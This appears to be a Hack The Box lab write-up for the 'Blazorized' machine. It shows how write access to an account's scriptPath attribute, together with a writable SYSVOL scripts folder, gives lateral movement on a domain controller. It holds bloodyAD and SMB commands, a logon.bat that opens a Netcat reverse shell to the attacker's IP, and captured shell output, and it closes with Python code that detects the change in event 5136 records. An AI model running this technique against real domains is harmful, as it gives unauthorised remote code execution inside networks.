Logon Script


┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ KRB5CCNAME=rsa_4810@dc1.blazorized.htb.ccache bloodyAD -d BLAZORIZED.HTB -k --host dc1.blazorized.htb get writable --detail           
 
distinguishedName: CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
scriptPath: WRITE
 
[...REDACTED...]

The rsa_4810 account has WRITE access to the scriptPath attribute of the ssa_6010 account. I will modify the logon script of the ssa_6010 user to obtain code execution.

┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ KRB5CCNAME=rsa_4810@dc1.blazorized.htb.ccache bloodyAD -d BLAZORIZED.HTB -k --host dc1.blazorized.htb set object ssa_6010 scriptPath -v 'C:\tmp\nc64.exe 10.10.14.110 4444 -e powershell'    
[+] ssa_6010's scriptPath has been updated

The logon script does not seem to be executing. This is likely due to group policy, as this is in the domain context.

The forum says that it is A32FF3AEAA23/logon.bat, but where does that even come from? Let's find out.

Domain Logon Script


┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ cat logon.bat 
@echo off
cmd /c C:\tmp\nc64.exe 10.10.14.110 4444 -e powershell

I created a batch script that executes the Netcat binary for a reverse shell.

┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ KRB5CCNAME=rsa_4810@dc1.blazorized.htb.ccache impacket-smbclient BLAZORIZED.HTB/@dc1.blazorized.htb -k -no-pass -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use SYSVOL
# ls
drw-rw-rw-          0  Mon Jan  8 20:30:33 2024 .
drw-rw-rw-          0  Mon Jan  8 20:30:33 2024 ..
drw-rw-rw-          0  Mon Jan  8 20:30:33 2024 blazorized.htb
# cd blazorized.htb
# ls
drw-rw-rw-          0  Mon Jan  8 20:36:56 2024 .
drw-rw-rw-          0  Mon Jan  8 20:36:56 2024 ..
drw-rw-rw-          0  Tue Jul  2 12:46:31 2024 DfsrPrivate
drw-rw-rw-          0  Sat Feb  3 01:48:25 2024 Policies
drw-rw-rw-          0  Wed May 29 21:37:21 2024 scripts
# cd scripts
# ls
drw-rw-rw-          0  Wed May 29 21:37:21 2024 .
drw-rw-rw-          0  Wed May 29 21:37:21 2024 ..
drw-rw-rw-          0  Wed May 29 21:38:28 2024 11DBDAEB100D
drw-rw-rw-          0  Wed May 29 21:33:22 2024 A2BFDCF13BB2
drw-rw-rw-          0  Wed Jul  3 00:08:53 2024 A32FF3AEAA23
drw-rw-rw-          0  Wed May 29 21:36:05 2024 CADFDDCE0BAD
drw-rw-rw-          0  Wed May 29 21:37:17 2024 CAFE30DAABCB

There are 5 directories under \\dc1.blazorized.htb\SYSVOL\blazorized.htb\scripts. This directory is the one backing the NETLOGON share, and a relative scriptPath value (such as A32FF3AEAA23/logon.bat) is resolved from there at logon, which is why the earlier absolute command line was never executed.

# cd 11DBDAEB100D
# put logon.bat
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
 
# cd A2BFDCF13BB2
# put logon.bat
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
 
# cd CADFDDCE0BAD
# put logon.bat
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
 
# cd CAFE30DAABCB
# put logon.bat
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
 
# cd A32FF3AEAA23
# put logon.bat
# ls
drw-rw-rw-          0  Wed Jul  3 00:30:42 2024 .
drw-rw-rw-          0  Wed Jul  3 00:30:42 2024 ..
-rw-rw-rw-          0  Wed May 29 23:17:10 2024 02FCE0D1303F.bat
drw-rw-rw-          0  Wed May 29 23:17:11 2024 113EB3B0B2D3
drw-rw-rw-          0  Wed May 29 23:17:12 2024 21FDFAAFC1D0
drw-rw-rw-          0  Wed May 29 23:17:12 2024 23010E0A1A33
drw-rw-rw-          0  Wed May 29 23:17:13 2024 2BECF3DC0B3D
drw-rw-rw-          0  Wed May 29 23:17:13 2024 2F3FCC01E0A3
drw-rw-rw-          0  Wed May 29 23:17:13 2024 3DACA30B03D1
drw-rw-rw-          0  Wed May 29 23:17:14 2024 3EAF2A3E0CED
drw-rw-rw-          0  Wed May 29 23:17:14 2024 A3F211DCB11D
drw-rw-rw-          0  Wed May 29 23:17:14 2024 AADE1BA2A3E3
drw-rw-rw-          0  Wed May 29 23:17:15 2024 AC2210DC311B
drw-rw-rw-          0  Wed May 29 23:17:15 2024 B2ACCF2BABFB
drw-rw-rw-          0  Wed May 29 23:17:16 2024 BE11A3E0EA13
drw-rw-rw-          0  Wed May 29 23:17:16 2024 BFDDF0E1B33E
drw-rw-rw-          0  Wed May 29 23:17:17 2024 C20F1322FB3C
drw-rw-rw-          0  Wed May 29 23:17:17 2024 CD102CDEFD0E
drw-rw-rw-          0  Wed May 29 23:17:17 2024 CED022B22EBA
drw-rw-rw-          0  Wed May 29 23:17:18 2024 D0ECECBC1CCF
drw-rw-rw-          0  Wed May 29 23:17:18 2024 F1D30FCB0100
drw-rw-rw-          0  Wed May 29 23:17:19 2024 FD33C0CE11AC
-rw-rw-rw-         65  Wed Jul  3 00:30:42 2024 logon.bat

I was able to put the batch script into the A32FF3AEAA23 directory. This suggests either:

  • that the current user, rsa_4810, has write access to the A32FF3AEAA23 directory
  • that the A32FF3AEAA23 directory belongs to the current user, rsa_4810

Now I will update the scriptPath attribute of the ssa_6010 account to A32FF3AEAA23/logon.bat.

┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ KRB5CCNAME=rsa_4810@dc1.blazorized.htb.ccache bloodyAD -d BLAZORIZED.HTB -k --host dc1.blazorized.htb set object ssa_6010 scriptPath -v 'A32FF3AEAA23/logon.bat'
[+] ssa_6010's scriptPath has been updated

┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ KRB5CCNAME=rsa_4810@dc1.blazorized.htb.ccache bloodyAD -d BLAZORIZED.HTB -k --host dc1.blazorized.htb get object 'CN=SSA_6010,CN=USERS,DC=BLAZORIZED,DC=HTB' --resolve-sd | grep -v 'nTSecurityDescriptor*'
 
distinguishedName: CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 2024-06-19 14:58:18.857519+00:00
cn: SSA_6010
dSCorePropagationData: 2024-06-19 13:24:50+00:00; 2024-06-14 12:40:41+00:00; 2024-06-14 12:40:28+00:00; 2024-06-14 12:38:20+00:00; 1601-01-01 00:00:00+00:00
displayName: SSA_6010
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2024-07-02 22:34:10.248035+00:00
lastLogonTimestamp: 2024-06-27 12:18:21.418633+00:00
logonCount: 4271
memberOf: CN=Super_Support_Administrators,CN=Users,DC=blazorized,DC=htb; CN=Remote Management Users,CN=Builtin,DC=blazorized,DC=htb
name: SSA_6010
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=blazorized,DC=htb
objectClass: top; person; organizationalPerson; user
objectGUID: {8bf3166b-e716-4f91-946c-174e1fb433ed}
objectSid: S-1-5-21-2039403211-964143010-2924010611-1124
primaryGroupID: 513
pwdLastSet: 2024-02-25 17:56:55.592981+00:00
sAMAccountName: SSA_6010
sAMAccountType: 805306368
scriptPath: A32FF3AEAA23/logon.bat
uSNChanged: 345995
uSNCreated: 29007
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
userPrincipalName: SSA_6010@blazorized.htb
whenChanged: 2024-07-02 22:13:53+00:00
whenCreated: 2024-01-10 14:32:00+00:00

Confirmed. Another important thing to note is that the logonCount attribute is 4271, which suggests that there is likely a scheduled task automating logons of the ssa_6010 account.

┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.22] 64221
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\Windows\system32> whoami
blazorized\ssa_6010
PS C:\Windows\system32> hostname
DC1
PS C:\Windows\system32> ipconfig
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.11.22
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2

Lateral movement to the ssa_6010 account was achieved by tampering with its logon script.
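From the defensive side, the change that enabled this path is visible in Windows Security event 5136 (directory service object modified) on the DC, provided auditing of directory service changes is enabled. The following is an added example, not part of the original writeup: it parses constructed, flattened 5136 records, flags scriptPath values being added, and resolves a relative value to the SYSVOL\<domain>\scripts location shown above so the file and its ACL can be checked. The APPROVED_SUBJECTS set and the key=value export format are assumptions for this example.

```python
"""Flag logon-script (scriptPath) changes in Windows Security event 5136 records."""
from dataclasses import dataclass

# Accounts expected to manage logon scripts (assumption for this example).
APPROVED_SUBJECTS = {"administrator"}
# Event 5136 OperationType code meaning "Value Added".
VALUE_ADDED = "%%14674"

# Constructed sample records, flattened key=value as a SIEM might export them.
SAMPLE_EVENTS = [
    "EventID=5136 SubjectUserName=rsa_4810 ObjectDN=CN=SSA_6010,CN=Users,DC=blazorized,DC=htb "
    "AttributeLDAPDisplayName=scriptPath AttributeValue=A32FF3AEAA23/logon.bat OperationType=%%14674",
    "EventID=5136 SubjectUserName=Administrator ObjectDN=CN=JDOE,CN=Users,DC=blazorized,DC=htb "
    "AttributeLDAPDisplayName=scriptPath AttributeValue=maint\\login.vbs OperationType=%%14674",
    "EventID=5136 SubjectUserName=rsa_4810 ObjectDN=CN=SSA_6010,CN=Users,DC=blazorized,DC=htb "
    "AttributeLDAPDisplayName=description AttributeValue=helpdesk OperationType=%%14674",
]

@dataclass
class Alert:
    subject: str
    target_dn: str
    script: str
    unc_path: str      # where the script will actually be loaded from
    severity: str

def parse_event(line: str) -> dict:
    """Split a flattened record into a dict; values must contain no spaces."""
    return dict(tok.split("=", 1) for tok in line.split())

def domain_from_dn(dn: str) -> str:
    """CN=X,DC=blazorized,DC=htb -> blazorized.htb"""
    return ".".join(p[3:] for p in dn.split(",") if p.upper().startswith("DC="))

def resolve_script(script: str, domain: str) -> str:
    """A relative scriptPath is loaded from the NETLOGON share, which is backed by
    SYSVOL\\<domain>\\scripts on the DC. A UNC value is used as-is."""
    if script.startswith("\\\\"):
        return script
    return f"\\\\{domain}\\SYSVOL\\{domain}\\scripts\\{script.replace('/', chr(92))}"

def detect(lines) -> list:
    """Return one Alert per scriptPath value added; non-approved subjects are high."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "5136" or ev.get("AttributeLDAPDisplayName") != "scriptPath":
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue
        subject = ev["SubjectUserName"]
        severity = "info" if subject.lower() in APPROVED_SUBJECTS else "high"
        domain = domain_from_dn(ev["ObjectDN"])
        alerts.append(Alert(subject, ev["ObjectDN"], ev["AttributeValue"],
                            resolve_script(ev["AttributeValue"], domain), severity))
    return alerts
```

A high-severity alert is worth pairing with a check of who can write to the resolved directory, since a world-writable scripts folder is the other half of this path.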